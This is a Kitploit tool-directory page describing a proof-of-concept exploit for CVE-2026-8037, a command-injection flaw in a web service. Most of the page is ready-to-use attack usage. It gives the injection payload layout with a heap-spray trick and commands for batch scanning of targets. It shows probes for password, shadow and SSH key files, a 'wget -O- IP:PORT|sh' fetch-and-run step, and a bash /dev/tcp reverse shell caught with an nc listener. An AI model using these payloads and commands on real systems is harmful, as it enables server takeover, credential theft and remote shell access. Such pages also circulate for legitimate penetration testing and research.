Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-8037-POC — 包括能执行的命令探测和一键getshell(需要服务器部署服务) | Kitploit
Tools/GitHubGitHub/caster-chen/cve-2026-8037-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

包括能执行的命令探测和一键getshell(需要服务器部署服务)

View Repository
1 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-8037-POC

Includes executable command detection and one-click getshell (requires server deployment service) pco.yaml can be used with nuclei for quick detection

Quick Start

Interactive Mode

root@kitploit:~
python go.py

Enter target URL → select function menu.

Detection Target

root@kitploit:~
# Fast detect (8 basic info items)
python go.py -t https://IP:PORT --probe fast

# Deep detect (all commands: 30+ items)
python go.py -t https://IP:PORT --probe deep

# Batch detect
python go.py -f vulnerable_targets.txt --probe fast

Execute Command

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# Batch concurrent (20 threads)
python go.py -f targets.txt -c "hostname" --batch 20

One-click Reverse Shell

Open two terminals on the attack machine:

root@kitploit:~
# Terminal 1 - HTTP server (serving rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# Terminal 2 - waiting for reverse shell
nc -lvnp 8088

Then send the payload:

root@kitploit:~
# Single target
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# Batch (serial, only one at a time)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

The script will print preparation steps before sending.


Deep Probe Content


Injection Principle

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <command> #", ...}
  • apiuser="''''" triggers escape_quotes() null termination bug
  • g0~g60 heap spray 61 times, improve success rate
  • '; <command> # closes the context, # comments out the rest

Length Limitation

Without echo tag, usable characters: 34

root@kitploit:~
wget -O- IP:PORT|sh    (31 characters)

Pipeline: wget download → sh execute → bash reverse shell to specified port.


Parameters Overview

Download Tool
CategoryCommand
Basic Infohostname, uname -a, kernel, OS release, uptime
Usersid, whoami, users/w/who
Networkifconfig, route, arp, listening ports, connections, iptables
Systemprocesses, cpuinfo, meminfo, disk, mount
Filesls / /root /tmp /home /etc
Configcrontab, passwd, shadow, sudoers, SSH keys
Extensionsconfig search, scripts, docker, containers
ParameterDescription
-t, --target URLTarget URL
-f, --file FILETarget list file
-l, --lhost IPAttack machine IP
-p, --lport PORTHTTP service port (default 8087)
-n, --ncport PORTnc listen port (default 8088)
-c, --cmd CMDExecute command
--probe fast/deepFast/Deep probe
--batch NBatch concurrency (default serial)